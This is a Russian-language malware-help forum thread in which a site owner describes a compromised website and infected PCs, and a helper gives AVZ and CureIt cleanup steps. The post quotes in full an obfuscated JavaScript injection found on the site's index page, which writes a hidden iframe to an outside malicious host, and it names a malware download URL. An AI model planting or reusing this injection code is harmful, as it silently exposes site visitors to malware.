Здравствуйте,
в какой момент начались проблемы не могу сказать. Мне позвонили пользователи сайта, на который я выкладываю статьи, говорят, что при загрузке главной страницы выпадает всплывающее окно с сообщением о вирусе.
"Ухо (09:38:37 27/10/200
на riverzoo.ru на главную заходишь запускается адобовский док, раза по четыре за заходи:
26.10.2008 21:49:54 HTTP filter file http://www.qmems.com.my/technology/html/ JS/Kryptik.B trojan connection terminated - quarantined COREKILLAH\ReZonatoR Threat was detected upon access to web by the application: C:\Program Files\Opera\opera.exe.
Проверял несколько раз."
у меня компьютер не ругался, и ничего не видел. На вопрос хостерам что это и как с ним бороться прислали следующую ссылку:
"1Gb.ru (13:43:38 27/10/200
Здравствуйте, ознакомьтесь пожалуйста со статьей http://www.1gb .ru/virus (уберите лишний пробел перед .ru)"
я поудаляла на трех компьютерах, с которыми я работала все записи паролей к фтп. начала искать на своем компьютере вирусы, не находил. в итоге с вчерашнего вечера обновленный нод (3) поймал в карантин ссылку http://newv2count.net/pictures1/ztool2 и постоянно меня об этом информирует.
еще отключается деспетчер задач. один раз включила (через редактор реестра), а он теперь опять говорит "Деспетчер задач отключен администратором".
в итоге на сайте в индексной странице нашли вконце код
<!-- o65 --><script type="text/javascript">function Decode(){var temp="",i,c=0,out=""; var str="60!105!102!114!97!109!101!32!115!114!99!61!39 !104!116!116!112!58!47!47!119!119!119!46!113!109!1 01!109!115!46!99!111!109!46!109!121!47!116!101!99! 104!110!111!108!111!103!121!47!104!116!109!108!47! 39!32!119!105!100!116!104!61!39!49!39!32!104!101!1 05!103!104!116!61!39!49!39!32!115!116!121!108!101! 61!39!118!105!115!105!98!105!108!105!116!121!58!32 !104!105!100!100!101!110!59!39!62!60!47!105!102!11 4!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++; out=out+String.fromCharCode(temp);temp="";}documen t.write(out);}Decode();</script><!-- c65 -->
удалили, сейчас вроде окна там не всплывают.
Деспетчер задач выключился. CureIt! не находит ничего. Нод тоже только ту карантинную ссылку. На одном из компов слетел виндовс.
Что мне делать дальше, и с моими компьютерами и с сайтами, чьи фтп данные были раньше у меня в фаре сохранены?
прикрепляю файлы, которые написаны в вашей инструкции.
заранее спасибо.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
карантин- Файл сохранён как 081029_065017_virus_49084df96e3bb.zip
я еще сначала закачала неполный карантин, до выполнения 2го скрипта, так что не считайте его (081029_071200_virus_49085310272d9.zip)
антивирусник (nod32 v3) теперь пишет, что
Maximum protection is not ensured. access to files, email and internet is not secured.
Antivirus protection is desabled. virus scaner instialization failed. most of eset nod32 modules will not function properly.
AVZ => Файл => Мастер поиска и устранения проблем. Категория проблемы - поставьте "Системные проблемы", степень опасности - "Все проблемы". Нажмите "Пуск". Всё найденное следует пометить и пофиксить. Данную операцию повторить для категории "Настройки и твики браузера".
Сделайте полную проверку CureIT и повторите логи...
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Вирус с сайта
